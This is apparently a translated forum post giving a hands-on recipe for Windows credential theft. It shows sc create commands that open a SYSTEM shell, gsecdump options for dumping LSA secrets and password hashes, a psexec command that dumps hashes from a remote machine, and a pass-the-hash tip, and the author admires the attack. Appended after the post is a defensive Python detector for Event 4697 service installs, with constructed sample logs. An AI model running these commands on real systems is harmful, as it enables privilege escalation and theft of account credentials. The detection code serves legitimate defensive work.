To get a DOS Prompt as NT system:
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------
Then in the new DOS window:
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:
PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

A tip: you can use iam from the pshtools toolkit to inject the hash information just grabbed with gsecdump into the local lsass process and carry out a hash-injection attack. The foreigners really are good at this; admins are going to have their hands full now. The LM/NT hashes obtained during ARP spoofing, and the ones obtained with gethash, actually never need the password cracked at all; it is just a matter of using the tools. As the original article puts it well: no matter whether the password is 4 characters or 127, once you have the hash it's 100% done.

Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
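Detection logic for the service-based SYSTEM shell shown in the post, added here as an example; it is not part of the post or of any tool it mentions. It assumes "A service was installed in the system" records (Security Event ID 4697) flattened to one key=value line each; the sample records are constructed, and the second one mirrors the sc create command above (cmd.exe as the service binary, ServiceType 0x110 = own process + interactive).

```python
import re

# Constructed sample 4697 records, one key=value line each. The second record
# mirrors the sc create command from the post; the other two are benign.
SAMPLE_EVENTS = [
    r'EventID=4697 ServiceName=Spooler ServiceFileName=C:\WINDOWS\system32\spoolsv.exe ServiceType=0x10 ServiceStartType=2 ServiceAccount=LocalSystem',
    r'EventID=4697 ServiceName=shellcmdline ServiceFileName="C:\WINDOWS\system32\cmd.exe /K start" ServiceType=0x110 ServiceStartType=3 ServiceAccount=LocalSystem',
    r'EventID=4697 ServiceName=Updater ServiceFileName="C:\Program Files\Vendor\upd.exe" ServiceType=0x10 ServiceStartType=2 ServiceAccount=LocalSystem',
]

SERVICE_INTERACTIVE_PROCESS = 0x100  # the bit that "type= interact" sets
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "cscript.exe", "wscript.exe"}
KV_RE = re.compile(r'(\w+)=("([^"]*)"|(\S+))')  # key=value or key="v with spaces"

def parse_event(line: str) -> dict:
    # Split one flattened record into its fields.
    return {m.group(1): m.group(3) if m.group(3) is not None else m.group(4)
            for m in KV_RE.finditer(line)}

def image_basename(service_file_name: str) -> str:
    # Executable name from a binpath, ignoring arguments such as "/K start".
    m = re.match(r'\s*"?(.*?\.exe)', service_file_name, re.IGNORECASE)
    return m.group(1).replace("/", "\\").rsplit("\\", 1)[-1].lower() if m else ""

def suspicious_reasons(ev: dict) -> list:
    # Reasons a 4697 record looks like a shell-as-service install; empty if benign.
    reasons = []
    if ev.get("EventID") != "4697":
        return reasons
    image = image_basename(ev.get("ServiceFileName", ""))
    if image in SHELL_IMAGES:
        reasons.append(f"service binary is a shell/interpreter: {image}")
    try:
        stype = int(ev.get("ServiceType", "0"), 16)
    except ValueError:
        stype = 0
    if stype & SERVICE_INTERACTIVE_PROCESS:
        reasons.append("SERVICE_INTERACTIVE_PROCESS flag set (type= interact)")
    return reasons

def scan(lines: list) -> dict:
    # Map service name -> reasons for every record that trips a rule.
    hits = {}
    for line in lines:
        ev = parse_event(line)
        reasons = suspicious_reasons(ev)
        if reasons:
            hits[ev.get("ServiceName", "?")] = reasons
    return hits
```

Calling scan(SAMPLE_EVENTS) flags only shellcmdline, for both the cmd.exe binary and the interactive flag; the post's sc start failing with error 1053 right after such an install is the other half of the same pattern, since cmd.exe never answers the service control manager.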